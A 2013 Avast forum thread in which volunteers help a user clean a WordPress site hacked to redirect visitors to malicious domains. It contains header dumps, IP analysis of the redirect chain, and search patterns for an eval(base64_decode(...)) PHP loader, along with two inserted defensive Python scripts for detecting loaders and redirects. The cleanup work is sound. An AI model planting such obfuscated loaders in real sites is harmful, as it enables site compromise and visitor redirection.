Author Topic: www redirections  (Read 31576 times)


klogier

  • Guest
Re: www redirections
« Reply #45 on: March 06, 2013, 11:15:27 PM »
Once more please, maybe this time in my native language. ;D

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #46 on: March 06, 2013, 11:57:01 PM »
Hello klogier.

And now in Polish.

Check the code you received carefully for where it was changed. Go back to the original code where possible and remove everything that is bad and cannot be repaired. Do this whole operation very carefully, otherwise you will not achieve the intended result. You have 843 items to fix.
If everything goes OK you can update WP,

pozdrawiam,

Damian
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

klogier

  • Guest
Re: www redirections
« Reply #47 on: March 07, 2013, 12:06:07 AM »
That is how I understood it earlier too, but I preferred to make sure.
So I should click delete where there is such an option and restore the original where there is such an option? I am asking to be sure; I hope I do not have to search for the relevant lines in the files' code with Notepad and remove them, and can just do this from the scanner's window?

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #48 on: March 07, 2013, 12:14:03 AM »
Hello klogier,

Be wise before the damage is done. That is why you have a full backup of all your WordPress files now.
We will protect ourselves against losing important data.

pozdrawiam,

Damian

« Last Edit: March 07, 2013, 12:38:54 AM by polonus »

klogier

  • Guest
Re: www redirections
« Reply #49 on: March 07, 2013, 07:10:49 PM »
Ok, after cleaning by Wordfence hxxp://targetservice.pl doesn't exist, and I don't have access to WP dashboard. Any ideas?

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #50 on: March 07, 2013, 07:50:41 PM »
Do not know what you have been doing, but go to: http://webcache.googleusercontent.com/search?client=flock&channel={flock%3Acontext}&q=cache:arfWkA0tZKwJ:http://targetservice.pl/%2Btargetservice.pl&oe=utf-8&hl=en&ct=clnk
Wait for !Donovan to guide you through the restoring from the back-up you made beforehand...
It is recommended you only use Wordfence to get your site into a running state in
order to recover the data you need to do a full reinstall...

polonus
« Last Edit: March 07, 2013, 08:51:33 PM by polonus »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #51 on: March 07, 2013, 09:05:43 PM »
What is worse, I get disconnected and again your site is being redirected:
Header returned by request for: http://targetservice.pl

HTTP/1.1 302 Moved Temporarily
Date: Thu, 07 Mar 2013 19:56:37 GMT
Server: Apache
Location: hxtp://opec.lflink.com/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html

What  I see there is only this:
DOMAIN##/   Apache   Thu, 07 Mar 2013 20:15:41 GMT   1   80   62.212.76.142   1            0
FOLDER##/   200   0   0   0   0   0
FILE##_index_defaultpage.html   272   text/html      200   Mon, 25 Jun 2012 11:19:09 GMT   44      1   0   0   1   1   -1   44   0   0   0   0   1   


The site opec.lflink dot com has been infecting 193 sites and now yours is being reinfected: http://labs.sucuri.net/?details=opec.lflink.com
See: http://urlquery.net/report.php?id=1289019

This was the last zulu zscaler report: http://zulu.zscaler.com/submission/show/05123b6375a6bd164a30b4f18cad49c2-1362075783
and this the most recent: http://zulu.zscaler.com/submission/show/05123b6375a6bd164a30b4f18cad49c2-1362687012

some suggestions how to keep your website clean:

    * Keep your website engine updated (including all themes/modules and etc).
    * Use dedicated/virtual server for your websites if possible.
    * Change all the passwords and make them more complicated.

polonus
« Last Edit: March 07, 2013, 09:23:15 PM by polonus »

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: www redirections
« Reply #52 on: March 08, 2013, 01:07:14 AM »
Hi klogier,

If you would, please create a backup of your current WordPress backup.

We shall attempt the manual approach.

First, please download and extract Notepad++. It can be downloaded as a zip file here.

After the extraction has finished, open Notepad++.exe. It should be located inside the unicode folder.

Then, press Ctrl+Shift+F. If you cannot, click on Search > Find in files...



You should see something like this:



Change the directory location to where you saved your 2nd backup version of WordPress. Leave filters empty and check the "In hidden folders" checkbox. "In all sub-folders" should already be checked.

Under "Find What", paste the following:
Code:
eval(base64_decode("DQ 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"));

Note: Remove the space near base64_decode("DQ...

Finally, click the "Replace In Files" button.

After that, please rescan the 2nd backup directory with avast! and report the results.

See attached if you're having trouble finding the buttons.

Thanks,
~!Donovan
« Last Edit: March 08, 2013, 01:26:58 AM by !Donovan »
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."
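The find-and-replace above looks for one literal loader string across the backup tree. As an added example (not code from the thread, nor from Notepad++, Wordfence or avast!), the Python script below does the same job in a way that generalizes: it matches any eval(base64_decode("...")) loader regardless of the base64 payload, reports which files carry it, and only strips it when asked, saving an .infected.bak copy first. The sample file contents and the payload inside them are constructed for the demo and decode to nothing meaningful; the directory layout is assumed, not taken from the site.

```python
"""Find (and optionally strip) eval(base64_decode(...)) loaders in a WordPress backup.

Added example, not code from the thread. It generalizes the literal search in the
post: any base64 payload is matched, not one fixed string, since re-infections
rarely reuse the same blob.
"""
import os
import re
import shutil

# Loader shape: eval(base64_decode("<base64>")); with optional whitespace and either
# quote style. Compiled as bytes so files of any encoding round-trip unchanged.
INJECTION_RE = re.compile(
    rb"""eval\s*\(\s*base64_decode\s*\(\s*["'][A-Za-z0-9+/=\s]+["']\s*\)\s*\)\s*;?"""
)

# Constructed sample: an injected config-style file. The payload is made up.
SAMPLE_INFECTED = (
    b'<?php eval(base64_decode("DQpjb25zdHJ1Y3RlZCBzYW1wbGU="));?>\n'
    b"<?php\n"
    b"define('DB_NAME', 'wordpress');\n"
)

# File types worth scanning in a WordPress tree (assumption for this example).
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".txt")


def find_injections(data):
    """Return every loader snippet found in a file's bytes."""
    return [m.group(0) for m in INJECTION_RE.finditer(data)]


def strip_injections(data):
    """Remove every loader; returns (cleaned_bytes, removed_count)."""
    return INJECTION_RE.subn(b"", data)


def scan_tree(root, remove=False):
    """Walk a backup tree and map each infected path to its hit count.

    With remove=True the original is copied beside the file as *.infected.bak
    before the cleaned bytes are written, so an over-match can be undone.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            hits = find_injections(data)
            if not hits:
                continue
            report[path] = len(hits)
            if remove:
                shutil.copy2(path, path + ".infected.bak")
                cleaned, _count = strip_injections(data)
                with open(path, "wb") as fh:
                    fh.write(cleaned)
    return report


if __name__ == "__main__":
    import sys
    import tempfile

    remove = "--remove" in sys.argv
    args = [a for a in sys.argv[1:] if a != "--remove"]
    if args:
        root = args[0]
    else:
        # No directory given: build a one-file demo tree from the constructed sample.
        root = tempfile.mkdtemp()
        with open(os.path.join(root, "wp-config.php"), "wb") as fh:
            fh.write(SAMPLE_INFECTED)
    for path, count in scan_tree(root, remove=remove).items():
        print(f"{count} loader(s): {path}")
```

Run it against the second backup copy first without --remove and compare the hit list with what avast! reports; once the list looks right, run again with --remove and re-scan.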

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #53 on: March 08, 2013, 11:27:05 AM »
Hi !Donovan,

Thank you and I trust you can work klogier through that part of his WP ordeal.

Now first some further info about the recent and previous redirect. I assume this is some Malware Network Compromised Redirect, as we call this.
klogier's site -http://targetservice.pl/ is hosted at 62.212.76.142, state now: redirected.
IP 62.212.76.142 uses the reverse pointer s91.linuxpl dot com only.
For the redirect to opec.lflink dot com/ I get a Server error: 403 Forbidden, and the mentioned site is redirecting visitors, including visitors coming from search engines, to the URL: htxp://restmee.net/in/?pid=16&lid=79&page=/horo2013/&p=0&s=4606
-> http://aw-snap.info/file-viewer/?tgt=+http%3A%2F%2Frestmee.net%2Fin%2F%3Fpid%3D16%26lid%3D79%26page%3D%2Fhoro2013%2F%26p%3D0%26s%3D4606&ref_sel=Google&ua_sel=ff
This URL is at IP: 93.170.108.41, a dummy description from camxx.ru (SEO DNS - Detected a Dynamic DNS URL, 93.170.0.0/15 Dummy description for 93.170.0.0/15 AS44546, AS44546 (not announced)) re: http://www.mywot.com/en/scorecard/restmee.net
Earlier in this thread the other redirect was from 62.212.76.142 to 31.148.220.14 (also fraudulent).
31.148.220.14 resolves to ASN AS5580 Atrato IP Networks (also with malicious URLs and current events)
Location: Netherlands
This URL is not confirmed as malicious. I get: HTTP/1.0 302 Found
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Set-Cookie: vc=NL; path=/; domain=46.183.147.108
Set-Cookie: uid=2876; path=/; domain=46.183.147.108
Set-Cookie: pid=16; path=/; domain=46.183.147.108
Set-Cookie: s=4606; path=/; domain=46.183.147.108
Set-Cookie: bs=1; path=/; domain=46.183.147.108
Set-Cookie: ref=0; path=/; domain=46.183.147.108
Set-Cookie: ctr=1-1; path=/; domain=46.183.147.108
Set-Cookie: mf_popup=0; path=/; domain=46.183.147.108
Set-Cookie: data=deleted; expires=Thu, 08-Mar-2012 10:01:00 GMT; path=/; domain=46.183.147.108
Set-Cookie: lid=79; path=/; domain=46.183.147.108
Location: http://46.183.147.108/horo2013/ see: http://urlquery.net/report.php?id=1318268
Content-type: text/html
Content-Length: 0
Date: Fri, 08 Mar 2013 10:01:01 GMT
Server: lighttpd/1.4.28
Connection: close
Here I also get disconnected and this:
HTTP/1.0 404 Not Found
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Content-type: text/html
Content-Length: 123
Connection: close
Date: Fri, 08 Mar 2013 10:24:28 GMT
Server: lighttpd/1.4.28


<h2>Error 404</h2>

<div class="error">
Невозможно обработать запрос &quot;horo2013&quot;.</div>
Re to decode: http://www.phpkode.com/source/p/pyrocms/pyrocms-pyrocms-fc6071c/system/codeigniter/language/russian/ftp_lang.php
['ftp_unable_to_connect'] ....
And we can establish that there must be abusive php ftp attacks going on there originating from camxx.ru (Badness going on in Holland!)

So this is all taking place on the server in the Netherlands: http://urlquery.net/report.php?id=1318303
AS16265 LeaseWeb B.V. has quite some reputation for allowing dubious practices on its servers, see the Badness Graphics at Sitevet.

AS Name: LEASEWEB LeaseWeb B.V.

IPs allocated: 349184

Blacklisted URLs: 4642

Hosts...

...malicious URLs? Yes

...badware? Yes

...botnet C&C servers? No

...exploit servers? Yes

...Zeus botnet servers? Yes

...Current Events? Yes

...phishing servers? Yes

...spam servers? Yes

...spam bots? Yes

...spam activity? Yes

polonus
« Last Edit: March 08, 2013, 12:27:36 PM by polonus »
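Replies #51 and #53 both diagnose the compromise from raw response headers: a 302 whose Location points off the site, then a second hop to an IP literal with a string of Set-Cookie headers. As an added example (not code from the thread or from any of the tools it links), the Python below parses such a captured response head and classifies it relative to the site that should be serving it. The three sample captures are constructed from the header dumps quoted in the thread, trimmed and not live; everything else (function names, the verdict strings) is this example's own.

```python
"""Classify captured HTTP response heads for off-site redirects.

Added example, not code from the thread. Samples are constructed from the
header dumps quoted in the thread, not live captures.
"""
from urllib.parse import urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Constructed sample 1: front page bouncing visitors off-site (reply #51).
SAMPLE_REDIRECT = """HTTP/1.1 302 Moved Temporarily
Date: Thu, 07 Mar 2013 19:56:37 GMT
Server: Apache
Location: http://opec.lflink.com/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
"""

# Constructed sample 2: second hop, repeated Set-Cookie headers, IP-literal Location (reply #53).
SAMPLE_SECOND_HOP = """HTTP/1.0 302 Found
X-Powered-By: PHP/5.3.5-1ubuntu7.11
Set-Cookie: vc=NL; path=/; domain=46.183.147.108
Set-Cookie: pid=16; path=/; domain=46.183.147.108
Location: http://46.183.147.108/horo2013/
Content-type: text/html
Content-Length: 0
"""

# Constructed sample 3: a plain 404, no redirect at all.
SAMPLE_NOT_FOUND = """HTTP/1.0 404 Not Found
Content-type: text/html
Content-Length: 123
"""


def parse_response_head(raw):
    """Return (status_code, headers) for a raw response head.

    Header names are lower-cased; values are kept in a list because headers
    such as Set-Cookie legitimately repeat.
    """
    lines = raw.strip().splitlines()
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the head; anything after is body
        name, _sep, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def _normalize_host(host):
    """Lower-case, drop a trailing dot and a leading www. so comparisons line up."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def redirect_verdict(site_host, status, headers):
    """Classify a response relative to the site expected to be serving it."""
    if status not in REDIRECT_STATUSES:
        return "no-redirect"
    locations = headers.get("location", [])
    if not locations:
        return "redirect-without-location"
    target = urlsplit(locations[0]).hostname
    if target is None:
        return "same-site"  # relative Location stays on this host
    site = _normalize_host(site_host)
    target = _normalize_host(target)
    if target == site or target.endswith("." + site):
        return "same-site"
    return "off-site:" + target


def check_capture(site_host, raw):
    """Convenience wrapper: parse a raw head and return its verdict."""
    return redirect_verdict(site_host, *parse_response_head(raw))


if __name__ == "__main__":
    for label, raw in (("front page", SAMPLE_REDIRECT),
                       ("second hop", SAMPLE_SECOND_HOP),
                       ("404", SAMPLE_NOT_FOUND)):
        print(f"{label}: {check_capture('targetservice.pl', raw)}")
```

Anything that comes back as off-site for the site's own front page is the condition the thread is chasing; the same-site branch exists so legitimate http-to-https or www redirects are not flagged, and the 404 case shows that a disconnected or missing page is a different finding from a redirect.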

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: www redirections
« Reply #54 on: March 08, 2013, 05:58:01 PM »

klogier

  • Guest
Re: www redirections
« Reply #55 on: March 08, 2013, 11:03:57 PM »
Hi.
Notepad++ didn't find the code below in any file
Code:
eval(base64_decode("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"));

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: www redirections
« Reply #56 on: March 08, 2013, 11:36:56 PM »
Did you follow all the instructions I mentioned? Did you select the correct directory?

~!Donovan

klogier

  • Guest
Re: www redirections
« Reply #57 on: March 09, 2013, 12:34:16 AM »
Probably, please look at the screenshots.

Maybe it would be better if I send you the whole backup and you check it on your own?

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: www redirections
« Reply #58 on: March 09, 2013, 01:45:55 AM »
The string should've been found.. can you try rescanning the directory with avast!, then report the results?

klogier

  • Guest
Re: www redirections
« Reply #59 on: March 09, 2013, 01:55:44 AM »
Scan report
502 threats
I looked into one of the files with MS Notepad and I think there is a similar string, but not the same as the one you gave me.
Code:
eval(base64_decode("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"));
« Last Edit: March 09, 2013, 02:01:04 AM by klogier »